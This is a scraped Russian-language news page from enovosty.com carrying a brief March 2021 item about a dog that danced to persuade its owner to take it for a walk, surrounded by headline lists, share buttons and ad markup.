href="https://enovosty.com/news_politics/full/1903-snbo-vvel-sankcii-protiv-19-kompanij">СНБО ввел санкции против 19 компаний</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837327"> <span class="postDate">19:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-v-parizhe-vvodyat-lokdaun-fox-news">В Париже вводят локдаун, - Fox News</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837322"> <span class="postDate">18:48</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1903-lishnix-mer-bezopasnosti-ne-byvaet-v-stolichnom-metro-zametili-muzhchinu-v-protivogaze">"Лишних мер безопасности не бывает": в столичном метро заметили мужчину в противогазе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837318"> <span class="postDate">18:28</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1903-rada-osvobodila-proizvoditelej-covid-vakcin-ot-otvetstvennosti">Рада освободила производителей COVID-вакцин от ответственности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837316"> <span class="postDate">18:08</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-v-kievskoj-oblasti-vvodyat-lokdaun">В Киевской области вводят локдаун</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837313"> <span class="postDate">17:41</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-v-evrope-planiruyut-uskorit-process-vakcinacii-reuters">В Европе планируют ускорить процесс вакцинации, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837310"> <span class="postDate">17:20</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1903-liberalizaciya-rynka-zemli-mozhet-uvelichit-vvp-ukrainy">Либерализация рынка земли может увеличить ВВП Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837307"> <span class="postDate">17:10</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1903-pribyl-avtoproizvoditelya-lamborghini-v-2020-godu-okazalas-rekordnoj">Прибыль автопроизводителя Lamborghini в 2020 году оказалась рекордной</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837301"> <span class="postDate">16:48</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-vsu-podarili-lovca-dronov-foto">ВСУ подарили "ловца дронов" (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837305"> <span class="postDate">16:38</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1903-my-bolshaya-frakciya-i-vse-xotyat-s-nami-druzhit-kornienko-o-vozmozhnoj-koalicii-s-partiej-es-video">Мы большая фракция и все хотят с нами дружить, - Корниенко о возможной коалиции с партией «ЕС» (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837299"> <span class="postDate">16:18</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1903-stolichnaya-vlast-rasshirila-predprinimatelyam-lgoty-na-vremya-karantina">Столичная власть расширила предпринимателям льготы на время карантина</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post" style="margin:0; padding:0; " id="post-4837426"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО)</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_society">Новости общества</a> <span>&raquo;</span> Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО)</div><time datetime="2021-03-20T20:59:27+02:00"><span id="date">Новости общества, 20.03.2021 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9F%D0%B5%D1%81%2C+%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B8%D0%B2%D1%88%D0%B8%D0%B9+%D0%BD%D0%B0%D1%81%D1%82%D0%BE%D1%8F%D1%89%D0%B5%D0%B5+%D0%BF%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5+%D1%81+%D1%82%D0%B0%D0%BD%D1%86%D0%B0%D0%BC%D0%B8%2C+%D1%81%D1%82%D0%B0%D0%BB+%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%BE%D0%B9+%D0%A1%D0%B5%D1%82%D0%B8+%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9F%D0%B5%D1%81%2C+%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B8%D0%B2%D1%88%D0%B8%D0%B9+%D0%BD%D0%B0%D1%81%D1%82%D0%BE%D1%8F%D1%89%D0%B5%D0%B5+%D0%BF%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5+%D1%81+%D1%82%D0%B0%D0%BD%D1%86%D0%B0%D0%BC%D0%B8%2C+%D1%81%D1%82%D0%B0%D0%BB+%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%BE%D0%B9+%D0%A1%D0%B5%D1%82%D0%B8+%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4837426" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Собаки обожают прогулки, и долго их уговаривать не приходится. Скорее, наоборот, они чаще сами напоминают и просят владельцев сходить с ними в ближайший парк.</b></p> <div class="single_main_image"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="399" height="403" src="https://enovosty.com/wp-content/uploads/2021/03/screenshot_15.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2021/03/screenshot_15.jpg 399w, https://enovosty.com/wp-content/uploads/2021/03/screenshot_15-112x112.jpg 112w, https://enovosty.com/wp-content/uploads/2021/03/screenshot_15-297x300.jpg 297w" sizes="(max-width: 399px) 100vw, 399px" /></div></div> <p>А жизнерадостный пес из этого видео прибежал к хозяину с мячиком в зубах и даже станцевал, показав, как ему не терпится поскорее отправиться играть на улице.</p><p>Об этом сообщают <a href="https://enovosty.com/">Экономические новости</a> со ссылкой на <a rel="nofollow" href="https://www.epochtimes.com.ua/novyny-suspilstva/pes-ustroyl-nastoyashchee-predstavlenye-chtoby-ugovoryt-hozyayna-pogulyat-s-nym-135739">epochtimes.com.ua</a>.</p><p><iframe src="https://video.ridus.ru/player/4c604172-2eb4-4082-89e1-38db5965d2bb" width="480" height="281" frameborder="0" allowfullscreen="allowfullscreen"><span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start">﻿</span></iframe></p><p>Забавное видео собрало тысячи просмотров и лайков от пользователей соцсетей.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4837426"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4837426&amp;_wpnonce=95b1383e8c"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Экономические новости" /></span><meta itemprop="datePublished" content="2021-03-20T20:59:27+02:00"/><meta itemprop="dateModified" content="2021-03-20T21:05:03+02:00"/><meta itemprop="genre" content="Новости общества"/><meta itemprop="description" content="Собаки обожают прогулки, и долго их уговаривать не приходится. Скорее, наоборот, они чаще сами напоминают и просят владельцев сходить с ними в ближайший парк."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/03/screenshot_15.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/03/screenshot_15.jpg"><meta itemprop="width" content="399"><meta itemprop="height" content="403"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/kurez" rel="tag">курьез</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 69</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9F%D0%B5%D1%81%2C+%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B8%D0%B2%D1%88%D0%B8%D0%B9+%D0%BD%D0%B0%D1%81%D1%82%D0%BE%D1%8F%D1%89%D0%B5%D0%B5+%D0%BF%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5+%D1%81+%D1%82%D0%B0%D0%BD%D1%86%D0%B0%D0%BC%D0%B8%2C+%D1%81%D1%82%D0%B0%D0%BB+%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%BE%D0%B9+%D0%A1%D0%B5%D1%82%D0%B8+%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9F%D0%B5%D1%81%2C+%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B8%D0%B2%D1%88%D0%B8%D0%B9+%D0%BD%D0%B0%D1%81%D1%82%D0%BE%D1%8F%D1%89%D0%B5%D0%B5+%D0%BF%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5+%D1%81+%D1%82%D0%B0%D0%BD%D1%86%D0%B0%D0%BC%D0%B8%2C+%D1%81%D1%82%D0%B0%D0%BB+%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%BE%D0%B9+%D0%A1%D0%B5%D1%82%D0%B8+%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29&url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4837426" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br><br /> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4837293"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1903-godovshhina-okkupacii-kryma-rossiej-kak-ukraina-namerena-vozvrashhat-ukradennoe">Годовщина оккупации Крыма Россией: как Украина намерена возвращать украденное</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836671"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1503-roman-bezsmertnij-vzhivayuchi-kroki-na-blokuvannya-dostovirnoi-informacii-pro-podii-na-fronti-nove-politichne-kerivnictvo-ukraini-faktichno-nanosilo-shkodu-zsu">Роман Безсмертний: Вживаючи кроки на блокування достовірної інформації про події на фронті, нове політичне керівництво України фактично наносило шкоду ЗСУ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836499"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/1403-elektrotyazhmash-yarkij-primer-razvala-energeticheskogo-mashinostroeniya-ukrainy">Электротяжмаш как пример развала энергетического машиностроения Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836128"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1103-vladimir-fesenko-razumkovu-nado-ochen-tochno-vybrat-moment-kogda-on-okonchatelno-razorvet-otnosheniya-s-komandoj-zelenskogo">Владимир Фесенко: Разумкову надо очень точно выбрать момент, когда он окончательно разорвет отношения с командой Зеленского</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836366"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/society/full/803-kariatida-s-mirom-na-plechax-izvestnye-ukrainki-rasskazali-kto-takaya-sovremennaya-zhenshhina">Кариатида с миром на плечах: Известные украинки рассказали, кто такая Современная Женщина</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836576"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/503-problemy-globalnoj-ekonomiki-spekulyativnoe-povyshenie-cen-bez-realnogo-ekonomicheskogo-rosta">Проблемы глобальной экономики: спекулятивное повышение цен без реального экономического роста</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836380"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/203-izrailskie-texnologii-i-opyt-pomogut-ukraine-v-razvitii-svoego-ogromnogo-potenciala-vlad-cherkasskij">Израильские технологии и опыт помогут Украине в развитии своего огромного потенциала, — Влад Черкасский</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4835353"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/902-stroitelnyj-rynok-problemy-otrasli-v-usloviyax-pandemii">Строительный рынок: проблемы отрасли в условиях пандемии</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4836477"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/society/full/2602-zakonoproekt-o-sisteme-obshhestvennogo-zdorovya-budut-li-nasilno-vakcinirovat-ukraincev">Законопроект «О системе общественного здоровья»: будут ли насильно вакцинировать украинцев</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4835340"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/802-generalnyj-direktor-pfk-denis-shevchenko-nash-kombinat-teper-mozhno-nazvat-ne-gradoobrazuyushhim-a-gromadoobrazuyushhim-predpriyatiem">Генеральный директор ПФК Денис Шевченко: «Наш комбинат теперь можно назвать не градообразующим, а громадообразующим предприятием»</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="zaw-ocifiqifodilibonedana"><script>!(function(w,m){(w[m]||(w[m]=[]))&&w[m].push(
{id:'zaw-ocifiqifodilibonedana',block:'119650', site_id:'20752'});})(window, 'mtzBlocks');</script></div><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/1603-v-ukraine-ustanovyat-pamyatnik-komaru-vysotoj-6-metrov-video"><img width="142" height="88" alt="В Украине установят памятник комару высотой 6 метров" src="https://enovosty.com/wp-content/uploads/2021/03/mymedqdloygtbt3jjnjuckaco4tyal9d1hwc9ptj-e1615890710880.jpeg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1603-v-ukraine-ustanovyat-pamyatnik-komaru-vysotoj-6-metrov-video">В Украине установят памятник комару высотой 6 метров</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/1903-30-kilometrov-ada-najdena-xudshaya-doroga-v-ukraine-video"><img width="142" height="88" alt="30 километров ада: Найдена худшая дорога в Украине" src="https://enovosty.com/wp-content/uploads/2021/03/doroga1.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1903-30-kilometrov-ada-najdena-xudshaya-doroga-v-ukraine-video">30 километров ада: Найдена худшая дорога в Украине</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1603-pojmaj-menya-esli-smozhesh-v-stolice-policejskie-pytalis-zaderzhat-kurera-video"><img width="142" height="88" alt="Поймай меня, если сможешь: В столице полицейские пытались задержать курьера" src="https://enovosty.com/wp-content/uploads/2021/03/2021-03-16.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1603-pojmaj-menya-esli-smozhesh-v-stolice-policejskie-pytalis-zaderzhat-kurera-video">Поймай меня, если сможешь: В столице полицейские пытались задержать курьера</a></div></td></tr><tr><td class="view"><span><i></i>2641</span></td><td class="view"><span><i></i>2616</span></td><td class="view last"><span><i></i>2262</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/1703-desantno-shturmovye-vojska-pokazali-moshhnoe-video-trenirovki-video"><img width="142" height="88" alt="Десантно-штурмовые войска показали мощное видео тренировки" src="https://enovosty.com/wp-content/uploads/2021/03/1615979028-6408.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1703-desantno-shturmovye-vojska-pokazali-moshhnoe-video-trenirovki-video">Десантно-штурмовые войска показали мощное видео тренировки</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/1503-kiev-okutal-gustoj-tuman-vpechatlyayushhie-kadry-foto"><img width="142" height="88" alt="Киев в тумане: в Сети появились красивые фото столицы" src="https://enovosty.com/wp-content/uploads/2021/03/95f824e9c4798559b835f69faf72fc5c-e1615831616226.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/1503-kiev-okutal-gustoj-tuman-vpechatlyayushhie-kadry-foto">Киев в тумане: в Сети появились красивые фото столицы</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1503-smertelnoe-dtp-v-kieve-dvoe-lyudej-stali-zhertvami-netrezvogo-voditelya-video"><img width="142" height="88" alt="Смертельное ДТП в Киеве: двое людей стали жертвами нетрезвого водителя" src="https://enovosty.com/wp-content/uploads/2021/03/650x331-e1615797734259.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1503-smertelnoe-dtp-v-kieve-dvoe-lyudej-stali-zhertvami-netrezvogo-voditelya-video">Смертельное ДТП в Киеве: двое людей стали жертвами нетрезвого водителя</a></div></td></tr><tr><td class="view"><span><i></i>1629</span></td><td class="view"><span><i></i>1368</span></td><td class="view last"><span><i></i>1181</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti" rel="bookmark">Курьез: видео кортежа Зеленского активно обсуждают в сети</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2003-vypavshij-s-6-go-etazha-kot-razbil-steklo-v-priparkovannom-avtomobile-video" rel="bookmark">Выпавший с 6-го этажа кот разбил лобовое стекло в припаркованном автомобиле (ВИДЕО)</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-kurez-muzej-voskovyx-figur-v-texase-ubral-statuyu-trampa-po-neobychnoj-prichine" rel="bookmark">Курьез: Музей восковых фигур в Техасе убрал статую Трампа по необычной причине</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-rabotnik-goda-v-yaponii-nakazali-chinovnicu-kotoraya-uxodila-s-raboty-na-2-minuty-ranshe" rel="bookmark">"Работник года": в Японии наказали чиновницу, которая уходила с работы на 2 минуты раньше</a><br /></td> </tr><tr><td> <a 